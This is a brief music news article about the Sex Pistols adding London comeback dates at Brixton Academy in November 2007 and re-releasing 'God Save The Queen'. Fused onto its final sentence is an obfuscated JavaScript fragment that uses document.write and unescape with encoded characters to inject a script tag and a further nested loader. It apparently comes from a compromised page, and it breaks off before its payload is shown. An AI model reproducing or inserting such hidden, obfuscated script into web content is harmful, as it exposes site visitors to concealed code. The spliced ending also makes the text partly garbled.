Sex Pistols have confirmed plans to play two more comeback shows in London in November.
The reformed punk legends sold-out the first date, at Brixton Academy, within minutes of tickets going on-sale this morning.
John Lydon and co today added another pair of concerts, and they have apparently also doubled the ticket prices up to £85.
Announcing the dates last week, Lydon commented: "Maybe it's because we're all Londoners, but there would be no Sex Pistols without dear old London town.
"See you all at Brixton with proper feelings and proper people all around. From London Bridge to The Rose And Crown, all of Britain is welcome so come on down."
Sex Pistols will now play the following gigs:
November 2007
08+09+19 Brixton Academy, London
The group will also re-release the infamous single "God Save The Queen" on October 8, to mark the 30th anniversary of its release.document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22